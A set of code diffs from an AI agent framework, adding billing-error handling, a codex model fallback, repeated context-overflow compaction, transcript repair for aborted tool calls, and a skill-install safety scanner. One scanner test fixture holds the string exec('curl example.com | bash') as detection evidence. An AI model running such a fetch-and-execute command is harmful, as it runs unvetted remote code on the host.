@@ -368,6 +371,10 @@ export function formatAssistantErrorText(
return "The AI service is temporarily overloaded. Please try again in a moment.";
}
if (isBillingErrorMessage(raw)) {
return BILLING_ERROR_USER_MESSAGE;
}
if (isLikelyHttpErrorText(raw) || isRawApiErrorPayload(raw)) {
return formatRawAssistantErrorForUi(raw);
}
@@ -403,6 +410,10 @@ export function sanitizeUserFacingText(text: string): string {
);
}
if (isBillingErrorMessage(trimmed)) {
return BILLING_ERROR_USER_MESSAGE;
}
if (isRawApiErrorPayload(trimmed) || isLikelyHttpErrorText(trimmed)) {
return formatRawAssistantErrorForUi(trimmed);
}
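Both formatAssistantErrorText and sanitizeUserFacingText now check isBillingErrorMessage before the generic raw-payload formatting, but the predicate itself is not part of this hunk. A minimal sketch that would satisfy the three test cases above (credit-balance wording, HTTP 402, "insufficient credits"); this is an assumption about its shape, not the shipped implementation:

function isBillingErrorMessageSketch(raw: string): boolean {
  // Matches the billing shapes exercised by the tests: Anthropic's credit-balance
  // message, a bare HTTP 402, and generic "insufficient credits" wording.
  const text = raw.toLowerCase();
  return (
    text.includes("credit balance is too low") ||
    text.includes("insufficient credits") ||
    /\b402\b/.test(text)
  );
}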

View File

@@ -1,4 +1,4 @@
import { describe, expect, it, vi } from "vitest";
import { beforeEach, describe, expect, it, vi } from "vitest";
vi.mock("../pi-model-discovery.js", () => ({
discoverAuthStorage: vi.fn(() => ({ mocked: true })),
@@ -6,6 +6,7 @@ vi.mock("../pi-model-discovery.js", () => ({
}));
import type { OpenClawConfig } from "../../config/config.js";
import { discoverModels } from "../pi-model-discovery.js";
import { buildInlineProviderModels, resolveModel } from "./model.js";
const makeModel = (id: string) => ({
@@ -18,6 +19,12 @@ const makeModel = (id: string) => ({
maxTokens: 1,
});
beforeEach(() => {
vi.mocked(discoverModels).mockReturnValue({
find: vi.fn(() => null),
} as unknown as ReturnType<typeof discoverModels>);
});
describe("buildInlineProviderModels", () => {
it("attaches provider ids to inline models", () => {
const providers = {
@@ -127,4 +134,74 @@ describe("resolveModel", () => {
expect(result.model?.provider).toBe("custom");
expect(result.model?.id).toBe("missing-model");
});
it("builds an openai-codex fallback for gpt-5.3-codex", () => {
const templateModel = {
id: "gpt-5.2-codex",
name: "GPT-5.2 Codex",
provider: "openai-codex",
api: "openai-codex-responses",
baseUrl: "https://chatgpt.com/backend-api",
reasoning: true,
input: ["text", "image"] as const,
cost: { input: 1.75, output: 14, cacheRead: 0.175, cacheWrite: 0 },
contextWindow: 272000,
maxTokens: 128000,
};
vi.mocked(discoverModels).mockReturnValue({
find: vi.fn((provider: string, modelId: string) => {
if (provider === "openai-codex" && modelId === "gpt-5.2-codex") {
return templateModel;
}
return null;
}),
} as unknown as ReturnType<typeof discoverModels>);
const result = resolveModel("openai-codex", "gpt-5.3-codex", "/tmp/agent");
expect(result.error).toBeUndefined();
expect(result.model).toMatchObject({
provider: "openai-codex",
id: "gpt-5.3-codex",
api: "openai-codex-responses",
baseUrl: "https://chatgpt.com/backend-api",
reasoning: true,
contextWindow: 272000,
maxTokens: 128000,
});
});
it("keeps unknown-model errors for non-gpt-5 openai-codex ids", () => {
const result = resolveModel("openai-codex", "gpt-4.1-mini", "/tmp/agent");
expect(result.model).toBeUndefined();
expect(result.error).toBe("Unknown model: openai-codex/gpt-4.1-mini");
});
it("uses codex fallback even when openai-codex provider is configured", () => {
// This test verifies the ordering: codex fallback must fire BEFORE the generic providerCfg fallback.
// If ordering is wrong, the generic fallback would use api: "openai-responses" (the default)
// instead of "openai-codex-responses".
const cfg: OpenClawConfig = {
models: {
providers: {
"openai-codex": {
baseUrl: "https://custom.example.com",
// No models array, or models without gpt-5.3-codex
},
},
},
} as OpenClawConfig;
vi.mocked(discoverModels).mockReturnValue({
find: vi.fn(() => null),
} as unknown as ReturnType<typeof discoverModels>);
const result = resolveModel("openai-codex", "gpt-5.3-codex", "/tmp/agent", cfg);
expect(result.error).toBeUndefined();
expect(result.model?.api).toBe("openai-codex-responses");
expect(result.model?.id).toBe("gpt-5.3-codex");
expect(result.model?.provider).toBe("openai-codex");
});
});

View File

@@ -19,6 +19,50 @@ type InlineProviderConfig = {
models?: ModelDefinitionConfig[];
};
const OPENAI_CODEX_GPT_53_MODEL_ID = "gpt-5.3-codex";
const OPENAI_CODEX_TEMPLATE_MODEL_IDS = ["gpt-5.2-codex"] as const;
function resolveOpenAICodexGpt53FallbackModel(
provider: string,
modelId: string,
modelRegistry: ModelRegistry,
): Model<Api> | undefined {
const normalizedProvider = normalizeProviderId(provider);
const trimmedModelId = modelId.trim();
if (normalizedProvider !== "openai-codex") {
return undefined;
}
if (trimmedModelId.toLowerCase() !== OPENAI_CODEX_GPT_53_MODEL_ID) {
return undefined;
}
for (const templateId of OPENAI_CODEX_TEMPLATE_MODEL_IDS) {
const template = modelRegistry.find(normalizedProvider, templateId) as Model<Api> | null;
if (!template) {
continue;
}
return normalizeModelCompat({
...template,
id: trimmedModelId,
name: trimmedModelId,
} as Model<Api>);
}
return normalizeModelCompat({
id: trimmedModelId,
name: trimmedModelId,
api: "openai-codex-responses",
provider: normalizedProvider,
baseUrl: "https://chatgpt.com/backend-api",
reasoning: true,
input: ["text", "image"],
cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
contextWindow: DEFAULT_CONTEXT_TOKENS,
maxTokens: DEFAULT_CONTEXT_TOKENS,
} as Model<Api>);
}
export function buildInlineProviderModels(
providers: Record<string, InlineProviderConfig>,
): InlineModelEntry[] {
@@ -85,6 +129,17 @@ export function resolveModel(
modelRegistry,
};
}
// Codex gpt-5.3 forward-compat fallback must be checked BEFORE the generic providerCfg fallback.
// Otherwise, if cfg.models.providers["openai-codex"] is configured, the generic fallback fires
// with api: "openai-responses" instead of the correct "openai-codex-responses".
const codexForwardCompat = resolveOpenAICodexGpt53FallbackModel(
provider,
modelId,
modelRegistry,
);
if (codexForwardCompat) {
return { model: codexForwardCompat, authStorage, modelRegistry };
}
const providerCfg = providers[provider];
if (providerCfg || modelId.startsWith("mock-")) {
const fallbackModel: Model<Api> = normalizeModelCompat({

View File

@@ -137,6 +137,7 @@ vi.mock("../pi-embedded-helpers.js", async () => {
isFailoverErrorMessage: vi.fn(() => false),
isAuthAssistantError: vi.fn(() => false),
isRateLimitAssistantError: vi.fn(() => false),
isBillingAssistantError: vi.fn(() => false),
classifyFailoverReason: vi.fn(() => null),
formatAssistantErrorText: vi.fn(() => ""),
pickFallbackThinkingLevel: vi.fn(() => null),
@@ -214,7 +215,9 @@ describe("overflow compaction in run loop", () => {
);
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(2);
expect(log.warn).toHaveBeenCalledWith(
expect.stringContaining("context overflow detected; attempting auto-compaction"),
expect.stringContaining(
"context overflow detected (attempt 1/3); attempting auto-compaction",
),
);
expect(log.info).toHaveBeenCalledWith(expect.stringContaining("auto-compaction succeeded"));
// Should not be an error result
@@ -241,31 +244,68 @@ describe("overflow compaction in run loop", () => {
expect(log.warn).toHaveBeenCalledWith(expect.stringContaining("auto-compaction failed"));
});
it("returns error if overflow happens again after compaction", async () => {
it("retries compaction up to 3 times before giving up", async () => {
const overflowError = new Error("request_too_large: Request size exceeds model context window");
// 4 overflow errors: 3 compaction retries + final failure
mockedRunEmbeddedAttempt
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }));
mockedCompactDirect
.mockResolvedValueOnce({
ok: true,
compacted: true,
result: { summary: "Compacted 1", firstKeptEntryId: "entry-3", tokensBefore: 180000 },
})
.mockResolvedValueOnce({
ok: true,
compacted: true,
result: { summary: "Compacted 2", firstKeptEntryId: "entry-5", tokensBefore: 160000 },
})
.mockResolvedValueOnce({
ok: true,
compacted: true,
result: { summary: "Compacted 3", firstKeptEntryId: "entry-7", tokensBefore: 140000 },
});
const result = await runEmbeddedPiAgent(baseParams);
// Compaction attempted 3 times (max)
expect(mockedCompactDirect).toHaveBeenCalledTimes(3);
// 4 attempts: 3 overflow+compact+retry cycles + final overflow → error
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(4);
expect(result.meta.error?.kind).toBe("context_overflow");
expect(result.payloads?.[0]?.isError).toBe(true);
});
it("succeeds after second compaction attempt", async () => {
const overflowError = new Error("request_too_large: Request size exceeds model context window");
mockedRunEmbeddedAttempt
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }));
.mockResolvedValueOnce(makeAttemptResult({ promptError: overflowError }))
.mockResolvedValueOnce(makeAttemptResult({ promptError: null }));
mockedCompactDirect.mockResolvedValueOnce({
ok: true,
compacted: true,
result: {
summary: "Compacted",
firstKeptEntryId: "entry-3",
tokensBefore: 180000,
},
});
mockedCompactDirect
.mockResolvedValueOnce({
ok: true,
compacted: true,
result: { summary: "Compacted 1", firstKeptEntryId: "entry-3", tokensBefore: 180000 },
})
.mockResolvedValueOnce({
ok: true,
compacted: true,
result: { summary: "Compacted 2", firstKeptEntryId: "entry-5", tokensBefore: 160000 },
});
const result = await runEmbeddedPiAgent(baseParams);
// Compaction attempted only once
expect(mockedCompactDirect).toHaveBeenCalledTimes(1);
// Two attempts: first overflow -> compact -> retry -> second overflow -> return error
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(2);
expect(result.meta.error?.kind).toBe("context_overflow");
expect(result.payloads?.[0]?.isError).toBe(true);
expect(mockedCompactDirect).toHaveBeenCalledTimes(2);
expect(mockedRunEmbeddedAttempt).toHaveBeenCalledTimes(3);
expect(result.meta.error).toBeUndefined();
});
it("does not attempt compaction for compaction_failure errors", async () => {

View File

@@ -29,9 +29,11 @@ import {
import { normalizeProviderId } from "../model-selection.js";
import { ensureOpenClawModelsJson } from "../models-config.js";
import {
BILLING_ERROR_USER_MESSAGE,
classifyFailoverReason,
formatAssistantErrorText,
isAuthAssistantError,
isBillingAssistantError,
isCompactionFailureError,
isContextOverflowError,
isFailoverAssistantError,
@@ -303,7 +305,8 @@ export async function runEmbeddedPiAgent(
}
}
let overflowCompactionAttempted = false;
const MAX_OVERFLOW_COMPACTION_ATTEMPTS = 3;
let overflowCompactionAttempts = 0;
try {
while (true) {
attemptedThinking.add(thinkLevel);
@@ -373,13 +376,23 @@ export async function runEmbeddedPiAgent(
if (promptError && !aborted) {
const errorText = describeUnknownError(promptError);
if (isContextOverflowError(errorText)) {
const msgCount = attempt.messagesSnapshot?.length ?? 0;
log.warn(
`[context-overflow-diag] sessionKey=${params.sessionKey ?? params.sessionId} ` +
`provider=${provider}/${modelId} messages=${msgCount} ` +
`sessionFile=${params.sessionFile} compactionAttempts=${overflowCompactionAttempts} ` +
`error=${errorText.slice(0, 200)}`,
);
const isCompactionFailure = isCompactionFailureError(errorText);
// Attempt auto-compaction on context overflow (not compaction_failure)
if (!isCompactionFailure && !overflowCompactionAttempted) {
if (
!isCompactionFailure &&
overflowCompactionAttempts < MAX_OVERFLOW_COMPACTION_ATTEMPTS
) {
overflowCompactionAttempts++;
log.warn(
`context overflow detected; attempting auto-compaction for ${provider}/${modelId}`,
`context overflow detected (attempt ${overflowCompactionAttempts}/${MAX_OVERFLOW_COMPACTION_ATTEMPTS}); attempting auto-compaction for ${provider}/${modelId}`,
);
overflowCompactionAttempted = true;
const compactResult = await compactEmbeddedPiSessionDirect({
sessionId: params.sessionId,
sessionKey: params.sessionKey,
@@ -538,6 +551,7 @@ export async function runEmbeddedPiAgent(
const authFailure = isAuthAssistantError(lastAssistant);
const rateLimitFailure = isRateLimitAssistantError(lastAssistant);
const billingFailure = isBillingAssistantError(lastAssistant);
const failoverFailure = isFailoverAssistantError(lastAssistant);
const assistantFailoverReason = classifyFailoverReason(lastAssistant?.errorMessage ?? "");
const cloudCodeAssistFormatError = attempt.cloudCodeAssistFormatError;
@@ -609,9 +623,11 @@ export async function runEmbeddedPiAgent(
? "LLM request timed out."
: rateLimitFailure
? "LLM request rate limited."
: authFailure
? "LLM request unauthorized."
: "LLM request failed.");
: billingFailure
? BILLING_ERROR_USER_MESSAGE
: authFailure
? "LLM request unauthorized."
: "LLM request failed.");
const status =
resolveFailoverStatus(assistantFailoverReason ?? "unknown") ??
(isTimeoutErrorMessage(message) ? 408 : undefined);
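The bookkeeping above replaces the single-shot overflowCompactionAttempted flag with a counter capped at MAX_OVERFLOW_COMPACTION_ATTEMPTS. Reduced to control flow, the retry behavior is roughly the sketch below (helper names other than those visible in the hunk are assumed):

async function runWithOverflowCompactionSketch(
  runAttempt: () => Promise<{ overflow: boolean }>,
  compact: () => Promise<{ ok: boolean; compacted: boolean }>,
): Promise<"ok" | "context_overflow"> {
  const MAX_OVERFLOW_COMPACTION_ATTEMPTS = 3;
  let overflowCompactionAttempts = 0;
  while (true) {
    const attempt = await runAttempt();
    if (!attempt.overflow) {
      return "ok";
    }
    if (overflowCompactionAttempts >= MAX_OVERFLOW_COMPACTION_ATTEMPTS) {
      return "context_overflow"; // give up after three compaction retries
    }
    overflowCompactionAttempts++;
    const compacted = await compact();
    if (!compacted.ok || !compacted.compacted) {
      return "context_overflow"; // compaction failed or was a no-op
    }
    // Otherwise loop and retry the prompt against the compacted session.
  }
}

With three overflows in a row this performs three compactions and a fourth attempt before surfacing a context_overflow error, and succeeds early if any retried attempt completes, which is what the updated tests assert.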

View File

@@ -1,10 +1,50 @@
import fs from "node:fs";
import os from "node:os";
import path from "node:path";
import { describe, expect, it, vi } from "vitest";
import { afterAll, beforeAll, describe, expect, it, vi } from "vitest";
import type { OpenClawConfig } from "../config/config.js";
import type { ExecApprovalsResolved } from "../infra/exec-approvals.js";
import { createOpenClawCodingTools } from "./pi-tools.js";
const previousBundledPluginsDir = process.env.OPENCLAW_BUNDLED_PLUGINS_DIR;
beforeAll(() => {
process.env.OPENCLAW_BUNDLED_PLUGINS_DIR = path.join(
os.tmpdir(),
"openclaw-test-no-bundled-extensions",
);
});
afterAll(() => {
if (previousBundledPluginsDir === undefined) {
delete process.env.OPENCLAW_BUNDLED_PLUGINS_DIR;
} else {
process.env.OPENCLAW_BUNDLED_PLUGINS_DIR = previousBundledPluginsDir;
}
});
vi.mock("../infra/shell-env.js", async (importOriginal) => {
const mod = await importOriginal<typeof import("../infra/shell-env.js")>();
return {
...mod,
getShellPathFromLoginShell: vi.fn(() => "/usr/bin:/bin"),
resolveShellEnvFallbackTimeoutMs: vi.fn(() => 500),
};
});
vi.mock("../plugins/tools.js", () => ({
getPluginToolMeta: () => undefined,
resolvePluginTools: () => [],
}));
vi.mock("../infra/shell-env.js", async (importOriginal) => {
const mod = await importOriginal<typeof import("../infra/shell-env.js")>();
return { ...mod, getShellPathFromLoginShell: () => null };
});
vi.mock("../plugins/tools.js", () => ({
resolvePluginTools: () => [],
getPluginToolMeta: () => undefined,
}));
vi.mock("../infra/exec-approvals.js", async (importOriginal) => {
const mod = await importOriginal<typeof import("../infra/exec-approvals.js")>();
@@ -46,6 +86,7 @@ describe("createOpenClawCodingTools safeBins", () => {
return;
}
const { createOpenClawCodingTools } = await import("./pi-tools.js");
const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw-safe-bins-"));
const cfg: OpenClawConfig = {
tools: {
@@ -68,10 +109,22 @@ describe("createOpenClawCodingTools safeBins", () => {
expect(execTool).toBeDefined();
const marker = `safe-bins-${Date.now()}`;
const result = await execTool!.execute("call1", {
command: `echo ${marker}`,
workdir: tmpDir,
});
const prevShellEnvTimeoutMs = process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS;
process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS = "1000";
const result = await (async () => {
try {
return await execTool!.execute("call1", {
command: `echo ${marker}`,
workdir: tmpDir,
});
} finally {
if (prevShellEnvTimeoutMs === undefined) {
delete process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS;
} else {
process.env.OPENCLAW_SHELL_ENV_TIMEOUT_MS = prevShellEnvTimeoutMs;
}
}
})();
const text = result.content.find((content) => content.type === "text")?.text ?? "";
expect(result.details.status).toBe("completed");

View File

@@ -1,9 +1,18 @@
import fs from "node:fs/promises";
import os from "node:os";
import path from "node:path";
import { describe, expect, it } from "vitest";
import { describe, expect, it, vi } from "vitest";
import { createOpenClawCodingTools } from "./pi-tools.js";
vi.mock("../plugins/tools.js", () => ({
getPluginToolMeta: () => undefined,
resolvePluginTools: () => [],
}));
vi.mock("../infra/shell-env.js", async (importOriginal) => {
const mod = await importOriginal<typeof import("../infra/shell-env.js")>();
return { ...mod, getShellPathFromLoginShell: () => null };
});
async function withTempDir<T>(prefix: string, fn: (dir: string) => Promise<T>) {
const dir = await fs.mkdtemp(path.join(os.tmpdir(), prefix));
try {
@@ -22,12 +31,11 @@ describe("workspace path resolution", () => {
it("reads relative paths against workspaceDir even after cwd changes", async () => {
await withTempDir("openclaw-ws-", async (workspaceDir) => {
await withTempDir("openclaw-cwd-", async (otherDir) => {
const prevCwd = process.cwd();
const testFile = "read.txt";
const contents = "workspace read ok";
await fs.writeFile(path.join(workspaceDir, testFile), contents, "utf8");
process.chdir(otherDir);
const cwdSpy = vi.spyOn(process, "cwd").mockReturnValue(otherDir);
try {
const tools = createOpenClawCodingTools({ workspaceDir });
const readTool = tools.find((tool) => tool.name === "read");
@@ -36,7 +44,7 @@ describe("workspace path resolution", () => {
const result = await readTool?.execute("ws-read", { path: testFile });
expect(getTextContent(result)).toContain(contents);
} finally {
process.chdir(prevCwd);
cwdSpy.mockRestore();
}
});
});
@@ -45,11 +53,10 @@ describe("workspace path resolution", () => {
it("writes relative paths against workspaceDir even after cwd changes", async () => {
await withTempDir("openclaw-ws-", async (workspaceDir) => {
await withTempDir("openclaw-cwd-", async (otherDir) => {
const prevCwd = process.cwd();
const testFile = "write.txt";
const contents = "workspace write ok";
process.chdir(otherDir);
const cwdSpy = vi.spyOn(process, "cwd").mockReturnValue(otherDir);
try {
const tools = createOpenClawCodingTools({ workspaceDir });
const writeTool = tools.find((tool) => tool.name === "write");
@@ -63,7 +70,7 @@ describe("workspace path resolution", () => {
const written = await fs.readFile(path.join(workspaceDir, testFile), "utf8");
expect(written).toBe(contents);
} finally {
process.chdir(prevCwd);
cwdSpy.mockRestore();
}
});
});
@@ -72,11 +79,10 @@ describe("workspace path resolution", () => {
it("edits relative paths against workspaceDir even after cwd changes", async () => {
await withTempDir("openclaw-ws-", async (workspaceDir) => {
await withTempDir("openclaw-cwd-", async (otherDir) => {
const prevCwd = process.cwd();
const testFile = "edit.txt";
await fs.writeFile(path.join(workspaceDir, testFile), "hello world", "utf8");
process.chdir(otherDir);
const cwdSpy = vi.spyOn(process, "cwd").mockReturnValue(otherDir);
try {
const tools = createOpenClawCodingTools({ workspaceDir });
const editTool = tools.find((tool) => tool.name === "edit");
@@ -91,7 +97,7 @@ describe("workspace path resolution", () => {
const updated = await fs.readFile(path.join(workspaceDir, testFile), "utf8");
expect(updated).toBe("hello openclaw");
} finally {
process.chdir(prevCwd);
cwdSpy.mockRestore();
}
});
});
@@ -99,7 +105,7 @@ describe("workspace path resolution", () => {
it("defaults exec cwd to workspaceDir when workdir is omitted", async () => {
await withTempDir("openclaw-ws-", async (workspaceDir) => {
const tools = createOpenClawCodingTools({ workspaceDir });
const tools = createOpenClawCodingTools({ workspaceDir, exec: { host: "gateway" } });
const execTool = tools.find((tool) => tool.name === "exec");
expect(execTool).toBeDefined();
@@ -122,7 +128,7 @@ describe("workspace path resolution", () => {
it("lets exec workdir override the workspace default", async () => {
await withTempDir("openclaw-ws-", async (workspaceDir) => {
await withTempDir("openclaw-override-", async (overrideDir) => {
const tools = createOpenClawCodingTools({ workspaceDir });
const tools = createOpenClawCodingTools({ workspaceDir, exec: { host: "gateway" } });
const execTool = tools.find((tool) => tool.name === "exec");
expect(execTool).toBeDefined();

View File

@@ -3,6 +3,7 @@ import { describe, expect, it } from "vitest";
import {
sanitizeToolCallInputs,
sanitizeToolUseResultPairing,
repairToolUseResultPairing,
} from "./session-transcript-repair.js";
describe("sanitizeToolUseResultPairing", () => {
@@ -112,6 +113,100 @@ describe("sanitizeToolUseResultPairing", () => {
expect(out.some((m) => m.role === "toolResult")).toBe(false);
expect(out.map((m) => m.role)).toEqual(["user", "assistant"]);
});
it("skips tool call extraction for assistant messages with stopReason 'error'", () => {
// When an assistant message has stopReason: "error", its tool_use blocks may be
// incomplete/malformed. We should NOT create synthetic tool_results for them,
// as this causes API 400 errors: "unexpected tool_use_id found in tool_result blocks"
const input = [
{
role: "assistant",
content: [{ type: "toolCall", id: "call_error", name: "exec", arguments: {} }],
stopReason: "error",
},
{ role: "user", content: "something went wrong" },
] as AgentMessage[];
const result = repairToolUseResultPairing(input);
// Should NOT add synthetic tool results for errored messages
expect(result.added).toHaveLength(0);
// The assistant message should be passed through unchanged
expect(result.messages[0]?.role).toBe("assistant");
expect(result.messages[1]?.role).toBe("user");
expect(result.messages).toHaveLength(2);
});
it("skips tool call extraction for assistant messages with stopReason 'aborted'", () => {
// When a request is aborted mid-stream, the assistant message may have incomplete
// tool_use blocks (with partialJson). We should NOT create synthetic tool_results.
const input = [
{
role: "assistant",
content: [{ type: "toolCall", id: "call_aborted", name: "Bash", arguments: {} }],
stopReason: "aborted",
},
{ role: "user", content: "retrying after abort" },
] as AgentMessage[];
const result = repairToolUseResultPairing(input);
// Should NOT add synthetic tool results for aborted messages
expect(result.added).toHaveLength(0);
// Messages should be passed through without synthetic insertions
expect(result.messages).toHaveLength(2);
expect(result.messages[0]?.role).toBe("assistant");
expect(result.messages[1]?.role).toBe("user");
});
it("still repairs tool results for normal assistant messages with stopReason 'toolUse'", () => {
// Normal tool calls (stopReason: "toolUse" or "stop") should still be repaired
const input = [
{
role: "assistant",
content: [{ type: "toolCall", id: "call_normal", name: "read", arguments: {} }],
stopReason: "toolUse",
},
{ role: "user", content: "user message" },
] as AgentMessage[];
const result = repairToolUseResultPairing(input);
// Should add a synthetic tool result for the missing result
expect(result.added).toHaveLength(1);
expect(result.added[0]?.toolCallId).toBe("call_normal");
});
it("drops orphan tool results that follow an aborted assistant message", () => {
// When an assistant message is aborted, any tool results that follow should be
// dropped as orphans (since we skip extracting tool calls from aborted messages).
// This addresses the edge case where a partial tool result was persisted before abort.
const input = [
{
role: "assistant",
content: [{ type: "toolCall", id: "call_aborted", name: "exec", arguments: {} }],
stopReason: "aborted",
},
{
role: "toolResult",
toolCallId: "call_aborted",
toolName: "exec",
content: [{ type: "text", text: "partial result" }],
isError: false,
},
{ role: "user", content: "retrying" },
] as AgentMessage[];
const result = repairToolUseResultPairing(input);
// The orphan tool result should be dropped
expect(result.droppedOrphanCount).toBe(1);
expect(result.messages).toHaveLength(2);
expect(result.messages[0]?.role).toBe("assistant");
expect(result.messages[1]?.role).toBe("user");
// No synthetic results should be added
expect(result.added).toHaveLength(0);
});
});
describe("sanitizeToolCallInputs", () => {

View File

@@ -213,6 +213,19 @@ export function repairToolUseResultPairing(messages: AgentMessage[]): ToolUseRep
}
const assistant = msg as Extract<AgentMessage, { role: "assistant" }>;
// Skip tool call extraction for aborted or errored assistant messages.
// When stopReason is "error" or "aborted", the tool_use blocks may be incomplete
// (e.g., partialJson: true) and should not have synthetic tool_results created.
// Creating synthetic results for incomplete tool calls causes API 400 errors:
// "unexpected tool_use_id found in tool_result blocks"
// See: https://github.com/openclaw/openclaw/issues/4597
const stopReason = (assistant as { stopReason?: string }).stopReason;
if (stopReason === "error" || stopReason === "aborted") {
out.push(msg);
continue;
}
const toolCalls = extractToolCallsFromAssistant(assistant);
if (toolCalls.length === 0) {
out.push(msg);

View File

@@ -0,0 +1,99 @@
import { beforeEach, describe, expect, it, vi } from "vitest";
const callGatewayMock = vi.fn();
vi.mock("../gateway/call.js", () => ({
callGateway: (opts: unknown) => callGatewayMock(opts),
}));
let configOverride: ReturnType<(typeof import("../config/config.js"))["loadConfig"]> = {
session: {
mainKey: "main",
scope: "per-sender",
},
};
vi.mock("../config/config.js", async (importOriginal) => {
const actual = await importOriginal<typeof import("../config/config.js")>();
return {
...actual,
loadConfig: () => configOverride,
resolveGatewayPort: () => 18789,
};
});
import "./test-helpers/fast-core-tools.js";
import { createOpenClawTools } from "./openclaw-tools.js";
import {
listSubagentRunsForRequester,
resetSubagentRegistryForTests,
} from "./subagent-registry.js";
describe("sessions_spawn requesterOrigin threading", () => {
beforeEach(() => {
resetSubagentRegistryForTests();
callGatewayMock.mockReset();
configOverride = {
session: {
mainKey: "main",
scope: "per-sender",
},
};
callGatewayMock.mockImplementation(async (opts: unknown) => {
const req = opts as { method?: string };
if (req.method === "agent") {
return { runId: "run-1", status: "accepted", acceptedAt: 1 };
}
// Prevent background announce flow by returning a non-terminal status.
if (req.method === "agent.wait") {
return { runId: "run-1", status: "running" };
}
return {};
});
});
it("captures threadId in requesterOrigin", async () => {
const tool = createOpenClawTools({
agentSessionKey: "main",
agentChannel: "telegram",
agentTo: "telegram:123",
agentThreadId: 42,
}).find((candidate) => candidate.name === "sessions_spawn");
if (!tool) {
throw new Error("missing sessions_spawn tool");
}
await tool.execute("call", {
task: "do thing",
runTimeoutSeconds: 1,
});
const runs = listSubagentRunsForRequester("main");
expect(runs).toHaveLength(1);
expect(runs[0]?.requesterOrigin).toMatchObject({
channel: "telegram",
to: "telegram:123",
threadId: 42,
});
});
it("stores requesterOrigin without threadId when none is provided", async () => {
const tool = createOpenClawTools({
agentSessionKey: "main",
agentChannel: "telegram",
agentTo: "telegram:123",
}).find((candidate) => candidate.name === "sessions_spawn");
if (!tool) {
throw new Error("missing sessions_spawn tool");
}
await tool.execute("call", {
task: "do thing",
runTimeoutSeconds: 1,
});
const runs = listSubagentRunsForRequester("main");
expect(runs).toHaveLength(1);
expect(runs[0]?.requesterOrigin?.threadId).toBeUndefined();
});
});

View File

@@ -0,0 +1,114 @@
import fs from "node:fs/promises";
import os from "node:os";
import path from "node:path";
import { beforeEach, describe, expect, it, vi } from "vitest";
import { installSkill } from "./skills-install.js";
const runCommandWithTimeoutMock = vi.fn();
const scanDirectoryWithSummaryMock = vi.fn();
vi.mock("../process/exec.js", () => ({
runCommandWithTimeout: (...args: unknown[]) => runCommandWithTimeoutMock(...args),
}));
vi.mock("../security/skill-scanner.js", async (importOriginal) => {
const actual = await importOriginal<typeof import("../security/skill-scanner.js")>();
return {
...actual,
scanDirectoryWithSummary: (...args: unknown[]) => scanDirectoryWithSummaryMock(...args),
};
});
async function writeInstallableSkill(workspaceDir: string, name: string): Promise<string> {
const skillDir = path.join(workspaceDir, "skills", name);
await fs.mkdir(skillDir, { recursive: true });
await fs.writeFile(
path.join(skillDir, "SKILL.md"),
`---
name: ${name}
description: test skill
metadata: {"openclaw":{"install":[{"id":"deps","kind":"node","package":"example-package"}]}}
---
# ${name}
`,
"utf-8",
);
await fs.writeFile(path.join(skillDir, "runner.js"), "export {};\n", "utf-8");
return skillDir;
}
describe("installSkill code safety scanning", () => {
beforeEach(() => {
runCommandWithTimeoutMock.mockReset();
scanDirectoryWithSummaryMock.mockReset();
runCommandWithTimeoutMock.mockResolvedValue({
code: 0,
stdout: "ok",
stderr: "",
signal: null,
killed: false,
});
});
it("adds detailed warnings for critical findings and continues install", async () => {
const workspaceDir = await fs.mkdtemp(path.join(os.tmpdir(), "openclaw-skills-install-"));
try {
const skillDir = await writeInstallableSkill(workspaceDir, "danger-skill");
scanDirectoryWithSummaryMock.mockResolvedValue({
scannedFiles: 1,
critical: 1,
warn: 0,
info: 0,
findings: [
{
ruleId: "dangerous-exec",
severity: "critical",
file: path.join(skillDir, "runner.js"),
line: 1,
message: "Shell command execution detected (child_process)",
evidence: 'exec("curl example.com | bash")',
},
],
});
const result = await installSkill({
workspaceDir,
skillName: "danger-skill",
installId: "deps",
});
expect(result.ok).toBe(true);
expect(result.warnings?.some((warning) => warning.includes("dangerous code patterns"))).toBe(
true,
);
expect(result.warnings?.some((warning) => warning.includes("runner.js:1"))).toBe(true);
} finally {
await fs.rm(workspaceDir, { recursive: true, force: true }).catch(() => undefined);
}
});
it("warns and continues when skill scan fails", async () => {
const workspaceDir = await fs.mkdtemp(path.join(os.tmpdir(), "openclaw-skills-install-"));
try {
await writeInstallableSkill(workspaceDir, "scanfail-skill");
scanDirectoryWithSummaryMock.mockRejectedValue(new Error("scanner exploded"));
const result = await installSkill({
workspaceDir,
skillName: "scanfail-skill",
installId: "deps",
});
expect(result.ok).toBe(true);
expect(result.warnings?.some((warning) => warning.includes("code safety scan failed"))).toBe(
true,
);
expect(result.warnings?.some((warning) => warning.includes("Installation continues"))).toBe(
true,
);
} finally {
await fs.rm(workspaceDir, { recursive: true, force: true }).catch(() => undefined);
}
});
});

View File

@@ -7,6 +7,7 @@ import type { OpenClawConfig } from "../config/config.js";
import { resolveBrewExecutable } from "../infra/brew.js";
import { fetchWithSsrFGuard } from "../infra/net/fetch-guard.js";
import { runCommandWithTimeout } from "../process/exec.js";
import { scanDirectoryWithSummary } from "../security/skill-scanner.js";
import { CONFIG_DIR, ensureDir, resolveUserPath } from "../utils.js";
import {
hasBinary,
@@ -32,6 +33,7 @@ export type SkillInstallResult = {
stdout: string;
stderr: string;
code: number | null;
warnings?: string[];
};
function isNodeReadableStream(value: unknown): value is NodeJS.ReadableStream {
@@ -77,6 +79,57 @@ function formatInstallFailureMessage(result: {
return `Install failed (${code}): ${summary}`;
}
function withWarnings(result: SkillInstallResult, warnings: string[]): SkillInstallResult {
if (warnings.length === 0) {
return result;
}
return {
...result,
warnings: warnings.slice(),
};
}
function formatScanFindingDetail(
rootDir: string,
finding: { message: string; file: string; line: number },
): string {
